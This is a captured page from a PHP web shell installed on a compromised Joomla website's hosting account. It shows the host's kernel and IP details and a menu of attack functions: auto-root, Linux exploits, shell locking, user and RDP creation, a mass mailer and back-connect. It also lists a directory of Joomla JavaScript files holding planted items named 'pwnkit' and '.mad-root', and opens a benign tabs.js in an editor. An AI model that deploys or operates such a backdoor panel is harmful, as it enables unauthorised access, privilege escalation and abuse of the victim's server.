Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
media /
system /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
fields
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
associations-edit-uncompressed...
7.09
KB
-rw----r--
associations-edit.js
2.06
KB
-rw----r--
calendar-setup-uncompressed.js
8.75
KB
-rw-r--r--
calendar-setup.js
3.02
KB
-rw-r--r--
calendar-uncompressed.js
48.02
KB
-rw-r--r--
calendar.js
29.5
KB
-rw-r--r--
caption-uncompressed.js
1.31
KB
-rw-r--r--
caption.js
491
B
-rw-r--r--
color-field-adv-init.js
654
B
-rw-r--r--
color-field-adv-init.min.js
413
B
-rw-r--r--
color-field-init.js
199
B
-rw-r--r--
color-field-init.min.js
182
B
-rw-r--r--
combobox-uncompressed.js
6.67
KB
-rw-r--r--
combobox.js
3.48
KB
-rw-r--r--
core-uncompressed.js
27.28
KB
-rw-r--r--
core.js
8.6
KB
-rw-r--r--
frontediting-uncompressed.js
6.08
KB
-rw-r--r--
frontediting.js
2.69
KB
-rw-r--r--
helpsite.js
1.04
KB
-rw-r--r--
highlighter-uncompressed.js
3.63
KB
-rw-r--r--
highlighter.js
1.55
KB
-rw-r--r--
html5fallback-uncompressed.js
13.31
KB
-rw-r--r--
html5fallback.js
5.8
KB
-rw-r--r--
jquery.Jcrop.js
73.88
KB
-rw-r--r--
jquery.Jcrop.min.js
37.48
KB
-rw-r--r--
keepalive-uncompressed.js
1.21
KB
-rw-r--r--
keepalive.js
462
B
-rw-r--r--
modal-fields-uncompressed.js
6.38
KB
-rw-r--r--
modal-fields.js
2.18
KB
-rw-r--r--
modal-uncompressed.js
13.13
KB
-rw-r--r--
modal.js
9.89
KB
-rw-r--r--
moduleorder.js
2.02
KB
-rw----r--
mootools-core-uncompressed.js
147.28
KB
-rw-r--r--
mootools-core.js
81.93
KB
-rw-r--r--
mootools-more-uncompressed.js
340.69
KB
-rw-r--r--
mootools-more.js
231.27
KB
-rw-r--r--
mootree-uncompressed.js
21.39
KB
-rw-r--r--
mootree.js
5.96
KB
-rw-r--r--
multiselect-uncompressed.js
1.33
KB
-rw-r--r--
multiselect.js
431
B
-rw-r--r--
passwordstrength.js
2.27
KB
-rw-r--r--
permissions-uncompressed.js
3.41
KB
-rw-r--r--
permissions.js
1.85
KB
-rw-r--r--
polyfill.classlist-uncompresse...
10.59
KB
-rw-r--r--
polyfill.classlist.js
4.74
KB
-rw-r--r--
polyfill.event-uncompressed.js
13.11
KB
-rw-r--r--
polyfill.event.js
6.32
KB
-rw-r--r--
polyfill.filter-uncompressed.j...
1.12
KB
-rw-r--r--
polyfill.filter.js
525
B
-rw-r--r--
polyfill.map-uncompressed.js
1.07
KB
-rw-r--r--
polyfill.map.js
509
B
-rw-r--r--
polyfill.xpath-uncompressed.js
29.32
KB
-rw-r--r--
polyfill.xpath.js
28.75
KB
-rw-r--r--
progressbar-uncompressed.js
2.78
KB
-rw-r--r--
progressbar.js
1.08
KB
-rw-r--r--
punycode-uncompressed.js
14.35
KB
-rw-r--r--
punycode.js
2.76
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
repeatable-uncompressed.js
16.89
KB
-rw-r--r--
repeatable.js
5.68
KB
-rw-r--r--
sendtestmail-uncompressed.js
1.57
KB
-rw-r--r--
sendtestmail.js
1012
B
-rw-r--r--
subform-repeatable-uncompresse...
10.04
KB
-rw----r--
subform-repeatable.js
4.22
KB
-rw----r--
switcher-uncompressed.js
2.32
KB
-rw-r--r--
switcher.js
1018
B
-rw-r--r--
tabs-state-uncompressed.js
8.83
KB
-rw-r--r--
tabs-state.js
2.5
KB
-rw-r--r--
tabs.js
2.49
KB
-rw-r--r--
validate-uncompressed.js
7.36
KB
-rw-r--r--
validate.js
3.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tabs.js
/** * @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ Object.append(Browser.Features, { localstorage: (function() { return ('localStorage' in window) && window.localStorage !== null; })() }); /** * Tabs behavior * * @package Joomla! * @subpackage JavaScript * @since 1.5 */ var JTabs = new Class({ Implements: [Options, Events], options : { display: 0, useStorage: true, onActive: function(title, description) { description.setStyle('display', 'block'); title.addClass('open').removeClass('closed'); }, onBackground: function(title, description){ description.setStyle('display', 'none'); title.addClass('closed').removeClass('open'); }, titleSelector: 'dt', descriptionSelector: 'dd' }, initialize: function(dlist, options){ this.setOptions(options); this.dlist = document.id(dlist); this.titles = this.dlist.getChildren(this.options.titleSelector); this.descriptions = this.dlist.getChildren(this.options.descriptionSelector); this.content = new Element('div').inject(this.dlist, 'after').addClass('current'); this.storageName = 'jpanetabs_'+this.dlist.id; if (this.options.useStorage) { if (Browser.Features.localstorage) { this.options.display = this.options.display || localStorage[this.storageName]; } else { this.options.display = this.options.display || Cookie.read(this.storageName); } } if (this.options.display === null || this.options.display === undefined) { this.options.display = 0; } this.options.display = this.options.display.toInt().limit(0, this.titles.length-1); for (var i = 0, l = this.titles.length; i < l; i++) { var title = this.titles[i]; var description = this.descriptions[i]; title.setStyle('cursor', 'pointer'); title.addEvent('click', this.display.bind(this, i)); description.inject(this.content); } this.display(this.options.display); if (this.options.initialize) this.options.initialize.call(this); }, hideAllBut: function(but) { for (var i = 0, l = this.titles.length; i < l; i++) { if (i != but) this.fireEvent('onBackground', [this.titles[i], this.descriptions[i]]); } }, display: function(i) { this.hideAllBut(i); this.fireEvent('onActive', [this.titles[i], this.descriptions[i]]); if (this.options.useStorage) { if (Browser.Features.localstorage) { localStorage[this.storageName] = i; } else { Cookie.write(this.storageName, i); } } } });
Close